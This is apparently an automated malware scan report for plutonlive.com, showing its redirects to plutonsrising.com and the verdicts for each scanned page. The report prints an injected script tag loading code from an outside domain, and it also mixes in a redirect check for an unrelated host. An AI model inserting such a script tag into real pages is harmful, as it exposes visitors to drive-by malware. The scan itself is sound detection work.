Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=plutonlive.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gallerylofts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 28 Oct 2015 06:41:31 GMT
Server: nginx/1.8.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: gallerylofts.com
Referer: http://www.google.com/search?q=gallerylofts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://plutonlive.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:07 GMT Location: http://www.plutonsrising.com/xavier.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047007403; path=/; expires=Wed, 14-Jan-2015 15:02:21 GMT | malicious |
http://www.plutonsrising.com/xavier.html | 200 OK Content-Length: 12751 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://goehren20.goracer.de/qx82pfmd.php?id=1603192"></script> | ||
http://www.plutonsrising.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 14118 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) Antivirus reports:
| ||
http://plutonlive.com/index.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:08 GMT Location: http://www.plutonsrising.com/xavier.html/index.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/index.html | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://www.plutonsrising.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://plutonlive.com/informations.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:09 GMT Location: http://www.plutonsrising.com/xavier.html/informations.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/informations.html | 404 Not Found Content-Length: 227 Content-Type: text/html | clean |
http://plutonlive.com/videos.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:09 GMT Location: http://www.plutonsrising.com/xavier.html/videos.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/videos.html | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://plutonlive.com/projets.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/projets.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/projets.html | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://plutonlive.com/liens.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/liens.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047009581; path=/; expires=Wed, 14-Jan-2015 15:02:21 GMT | malicious |
http://www.plutonsrising.com/xavier.html/liens.html | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://plutonlive.com/xavier.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/xavier.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047009581; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/xavier.html | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://plutonlive.com/le-bateau.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:10 GMT Location: http://www.plutonsrising.com/xavier.html/le-bateau.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047008492; path=/; expires=Wed, 14-Jan-2015 15:16:44 GMT | malicious |
http://www.plutonsrising.com/xavier.html/le-bateau.html | 404 Not Found Content-Length: 224 Content-Type: text/html | clean |
http://plutonlive.com/touchable.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/touchable.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047009581; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/touchable.html | 404 Not Found Content-Length: 224 Content-Type: text/html | clean |
http://plutonlive.com/dysharmonie.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/dysharmonie.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047010670; path=/; expires=Wed, 14-Jan-2015 15:16:44 GMT | malicious |
http://www.plutonsrising.com/xavier.html/dysharmonie.html | 404 Not Found Content-Length: 226 Content-Type: text/html | clean |
http://plutonlive.com/comic-on.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/comic-on.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047010670; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/comic-on.html | 404 Not Found Content-Length: 223 Content-Type: text/html | clean |
http://plutonlive.com/lost-highway.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:11 GMT Location: http://www.plutonsrising.com/xavier.html/lost-highway.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047006314; path=/; expires=Wed, 14-Jan-2015 15:04:19 GMT | malicious |
http://www.plutonsrising.com/xavier.html/lost-highway.html | 404 Not Found Content-Length: 227 Content-Type: text/html | clean |
http://plutonlive.com/endless.html | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 12 Jan 2015 03:01:12 GMT Location: http://www.plutonsrising.com/xavier.html/endless.html Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: rd=R3047008492; path=/; expires=Wed, 14-Jan-2015 15:15:53 GMT | malicious |
http://www.plutonsrising.com/xavier.html/endless.html | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |